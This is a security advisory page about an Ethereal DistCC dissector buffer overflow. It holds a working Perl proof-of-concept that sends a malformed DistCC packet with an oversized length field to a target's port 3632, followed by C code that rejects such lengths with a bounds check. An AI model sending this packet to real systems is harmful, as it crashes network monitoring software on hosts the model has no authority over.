Ethereal DistCC Buffer Overflow (Exploit)


As we reported in our previous article: Ethereal DistCC Dissector Overflow, a vulnerability in Ethereal’s DistCC dissector allows attackers to cause Ethereal to crash by overflowing an internal buffer used by Ethereal when it tries to handle DistCC related packets. The following exploit code can be used to test your system for the mentioned vulnerability.


The information has been provided by beSTORM.


Vulnerable Systems:
 * Ethereal version 0.10.10 and prior

Immune Systems:
 * Ethereal version 0.10.11 or newer

#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-05-10 12:45
# All Rights Reserved – Copyright ™

use IO::Socket;
use strict;

# Optional first argument: the host the packet will be sent to.
my $target = shift;
my $print_usage = 0;

if (!$target)
{
 print "No target has been supplied, reverting to";
 $target = "";
}

print "Will attack $target.\n";
my $target_port = 3632;

# DistCC request: each token is a 4-character tag followed by 8 hex digits.
# The first ARGV token declares a length of FFFFFF00.
my $packet =<<END;
DIST00000001ARGC00000008ARGVFFFFFF00ccARGV00000002-gARGV00000003-O2ARGV00000005-WallARGV00000002-cARGV00000006main.cARGV00000002-oARGV00000006main.oDOTI0000001Bint main()\n{\n return(0);\n}\n
END

print "Sending: [$packet]\n";

# Connect to the DistCC port on the target.
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target, PeerPort => $target_port);

unless ($remote) { die "cannot connect to distcc daemon on $target" }

print $remote $packet;

print "Done.\n";

# Print the usage banner once.
sub usage
{
 if ($print_usage) { return; }
 $print_usage = 1;
 print ("#"x50);
 print "\n";
 print "# $0 [hostname]\n";
 print "# hostname\t-\tThe host the packet will be sent to.\n";
 print "\n";
}
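The packet above declares a length of FFFFFF00 for its first ARGV string. As an added example (not code from Ethereal or from the original advisory), the C code below walks the same tag-plus-eight-hex-digits framing and rejects such a length with an unsigned bounds check before anything is copied into a fixed buffer. The 256-byte buffer size, the names `distcc_check`, `hex8`, `last_arg` and the `DCC_*` codes, and the benign sample request are assumptions made for illustration; only the DIST, ARGC, ARGV and DOTI tokens seen in the packet are handled.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ARG_BUF 256  /* assumed size of the fixed per-argument buffer */
enum { DCC_TRUNCATED = -1, DCC_BAD_HEX = -2, DCC_LEN_TOO_BIG = -3 };
/* Opening tokens of the request shown on the page, and a constructed benign request. */
static const unsigned char PAGE_PKT[] = "DIST00000001ARGC00000008ARGVFFFFFF00ccARGV00000002-g";
static const unsigned char OK_PKT[] = "DIST00000001ARGC00000001ARGV00000002ccDOTI00000004int\n";
static char last_arg[ARG_BUF];  /* most recently accepted ARGV string */

/* Parse 8 hex digits as unsigned; the value never passes through a signed int. */
static int hex8(const unsigned char *p, uint32_t *out) {
    *out = 0;
    for (int i = 0; i < 8; i++) {
        unsigned c = p[i], d;
        if (c >= '0' && c <= '9') d = c - '0';
        else if ((c | 0x20u) >= 'a' && (c | 0x20u) <= 'f') d = (c | 0x20u) - 'a' + 10;
        else return DCC_BAD_HEX;
        *out = (*out << 4) | d;
    }
    return 0;
}

/* Walk the tokens; returns the number of ARGV strings accepted, or a DCC_* error. */
int distcc_check(const unsigned char *buf, size_t len) {
    size_t off = 0;
    int accepted = 0;
    while (off < len) {
        uint32_t n;
        if (len - off < 12) return DCC_TRUNCATED;          /* 4-byte tag + 8 hex digits */
        if (hex8(buf + off + 4, &n) != 0) return DCC_BAD_HEX;
        int argv = memcmp(buf + off, "ARGV", 4) == 0;
        int body = argv || memcmp(buf + off, "DOTI", 4) == 0;
        off += 12;
        if (!body) continue;                               /* DIST, ARGC: number only */
        if (argv && n >= ARG_BUF) return DCC_LEN_TOO_BIG;  /* unsigned compare, before any copy */
        if (n > len - off) return DCC_TRUNCATED;           /* body longer than the data present */
        if (argv) {
            memcpy(last_arg, buf + off, n);                /* n < ARG_BUF and n <= bytes left */
            last_arg[n] = '\0';
            accepted++;
        }
        off += n;
    }
    return accepted;
}

int main(void) {
    printf("%d %d\n", distcc_check(PAGE_PKT, sizeof PAGE_PKT - 1), distcc_check(OK_PKT, sizeof OK_PKT - 1));
    return 0;
}
```

Keeping the declared length in an unsigned type up to the comparison is the point of the check: a value such as FFFFFF00 read into a signed integer becomes negative and slips under a "greater than buffer size" test.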

